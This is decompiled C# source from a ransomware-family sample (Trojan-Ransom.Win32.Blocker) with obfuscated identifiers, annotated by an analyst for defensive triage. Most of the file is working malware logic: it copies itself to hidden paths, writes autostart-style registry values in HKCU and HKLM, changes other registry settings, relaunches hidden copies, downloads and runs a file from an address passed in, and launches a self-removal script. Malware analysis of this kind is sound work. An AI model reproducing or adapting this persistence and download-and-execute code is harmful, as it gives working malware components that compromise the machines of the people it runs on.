MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c3f3e07dcb3874c5b417537b713b608b7.cs

// Decompiled with JetBrains decompiler
// Type: A.c3f3e07dcb3874c5b417537b713b608b7
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
namespace A
{
// Analyst annotations (defensive triage of a decompiled, identifier-obfuscated sample).
// This class holds the sample's install / persistence / update / uninstall logic.
// All string constants are produced at run time by
// c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(int) and all
// configuration (mutex name, drop paths, value names, feature flag) lives in
// c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab; neither is
// visible in this file, so concrete registry keys, file names and paths must be
// recovered from those classes before writing host indicators.
// Every operation is wrapped in an empty catch-all, so failures are silent.
internal class c3f3e07dcb3874c5b417537b713b608b7
{
// Handle to the named mutex created in cc286121f05a5cd6b2f553091501ad86b().
private Mutex c96cf8adc07121b9089c8779f8a06475a;
/// <summary>
/// Start-up sequence: mutex check, registry value writes, then install/relaunch.
/// </summary>
public void c366d1ab19bbdf3ebcee35b30020550b1()
{
this.cc286121f05a5cd6b2f553091501ad86b();
this.c44a8775ef705aea893c2464d5dc35368();
this.c3a314ec321315e78451e3a3160d4e530();
}
/// <summary>
/// Creates a named mutex (name taken from the config class) and immediately releases it.
/// Any exception terminates the process with exit code -1.
/// </summary>
private void cc286121f05a5cd6b2f553091501ad86b()
{
try
{
// .NET only grants initial ownership when the named mutex is newly created; if it
// already exists, ReleaseMutex() below throws because this thread does not own it.
// NOTE(review): this looks like a single-instance guard — the mutex name is a
// candidate host indicator once read from the config class.
this.c96cf8adc07121b9089c8779f8a06475a = new Mutex(true, c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c053a2ccab85d88a8bb0dd1fb41fedf35);
this.c96cf8adc07121b9089c8779f8a06475a.ReleaseMutex();
}
catch
{
Environment.Exit(-1);
}
}
/// <summary>
/// Install routine. Unless c26b99a61e58734baa67d710bbfd72df9() reports true, copies the
/// running executable to each configured path, marks the copies Hidden, writes one
/// registry value per hive (HKCU and HKLM) pointing at the copies, starts the copies
/// with a hidden window and exits with code -1.
/// </summary>
private void c3a314ec321315e78451e3a3160d4e530()
{
// Full path of the currently running image; this is the copy source.
string fileName = Process.GetCurrentProcess().MainModule.FileName;
// Skip installation when the check on the first configured path succeeds.
if (this.c26b99a61e58734baa67d710bbfd72df9())
return;
try
{
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
{
// presumably c8f544... is a file-exists test — confirm in c4a101047227d6769ba130216f202ea07.
// Only the copy is conditional; the Hidden attribute is applied to every path.
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(str))
System.IO.File.Copy(fileName, str);
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
}
}
catch
{
}
try
{
// Writes value name [0] under HKCU and [1] under HKLM in the subkey decoded from
// string id 1705; the data is the matching drop path wrapped in double quotes.
// NOTE(review): presumably an autostart (Run-style) key — confirm by decoding 1705.
// The HKLM write needs elevation; if the HKCU write throws, the HKLM one is skipped.
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[0] + (object) '"'));
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[1] + (object) '"'));
}
catch
{
}
try
{
// The mutex handle is closed before the copies are started, so the relaunched
// instances can pass their own mutex check.
this.c96cf8adc07121b9089c8779f8a06475a.Close();
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
new Process()
{
StartInfo = {
FileName = str,
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
// The original (non-installed) instance always terminates here.
Environment.Exit(-1);
}
/// <summary>
/// Download-and-run routine: fetches the given address to a randomly named file,
/// starts it with a hidden window, then calls c514ba733b87988f147798195875c1771()
/// and exits with code -1.
/// </summary>
/// <param name="cf6d6107114ce95c52d91a8d33c162461">Address passed unchanged to WebClient.DownloadFile; the caller is not visible in this file.</param>
public void c32ad199a1a1b21b2f3794ba8b7927c6b(string cf6d6107114ce95c52d91a8d33c162461)
{
try
{
this.c96cf8adc07121b9089c8779f8a06475a.Close();
}
catch
{
}
try
{
// File name = helper(random int in [5, 12)) + decoded string 1680.
// presumably a random-length name plus an extension — confirm against the helper and decoder.
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
// Destination = value of the environment variable named by string 1689 + string 340 + file name.
// No integrity or origin check is performed on the downloaded content before it is run.
new WebClient().DownloadFile(cf6d6107114ce95c52d91a8d33c162461, Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
// Runs even when the download or launch above failed.
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
/// <summary>
/// Removal routine: deletes the two registry values written by the install routine,
/// deletes every configured drop path, then calls c514ba733b87988f147798195875c1771()
/// and exits with code -1.
/// </summary>
public void ceaf8f38b42d6fe6312cc350ddb4ba0d6()
{
try
{
// Same subkey (string id 1705) and value names as the install routine.
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0]);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1]);
}
catch
{
}
try
{
// The first failing delete aborts the loop; later paths are then left on disk.
foreach (string path in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
System.IO.File.Delete(path);
}
catch
{
}
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
/// <summary>
/// Checks the first configured drop path only.
/// </summary>
/// <returns>
/// false when the helper returns false for element 0 of the path array; true otherwise,
/// including when the array is empty. Later elements are never examined.
/// </returns>
private bool c26b99a61e58734baa67d710bbfd72df9()
{
string[] c712648a24a265f1e1bc00c1dfbecbd3e = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e;
int index = 0;
// An `if`, not a loop: index is never advanced.
if (index < c712648a24a265f1e1bc00c1dfbecbd3e.Length)
{
string c8ce60bab4df112e38d93bdc39407e331 = c712648a24a265f1e1bc00c1dfbecbd3e[index];
// presumably a file-exists test — confirm in c4a101047227d6769ba130216f202ea07.
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(c8ce60bab4df112e38d93bdc39407e331))
return false;
}
return true;
}
/// <summary>
/// Writes a one-line text file and starts it without a window. The line is built from
/// three decoded fragments (ids 1796, 1813, 1834) around the quoted first command-line
/// argument and the quoted file name of the running image.
/// </summary>
private void c514ba733b87988f147798195875c1771()
{
try
{
// NOTE(review): the shape (own path and own image name embedded in a script that is
// then launched just before exit) suggests a self-removal script — confirm by
// decoding the fragments and the file name (string id 1851).
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1796) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1813) + (object) '"' + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1834);
// Script path = value of the environment variable named by string 1689 + string 1851.
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851));
textWriter.WriteLine(str);
textWriter.Close();
// Launched directly (no shell execute) and with no console window.
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
/// <summary>
/// Writes DWORD registry values. One HKCU value is always written; three more
/// (one HKCU value in the same subkey, plus one value in a second subkey under both
/// HKCU and HKLM) are written only when the config flag ca20a8f4602f269ed2947b3a5ca5860a2 is set.
/// </summary>
private void c44a8775ef705aea893c2464d5dc35368()
{
try
{
// Subkey id 1874, value name id 1993, data id 2006.
// NOTE(review): key and value names are not visible here; DWORD writes of this
// shape are typical of per-user policy changes — confirm by decoding the ids.
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1993), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2006), RegistryValueKind.DWord);
}
catch
{
}
// Optional behaviour gated by a boolean in the config class.
if (!c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ca20a8f4602f269ed2947b3a5ca5860a2)
return;
try
{
// Same subkey (id 1874), second value name (id 2009), data id 2044.
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2009), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
try
{
// Second subkey (id 2047), value name id 2162, written under both hives.
// If the HKCU write throws, the HKLM write is skipped.
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
}
}
}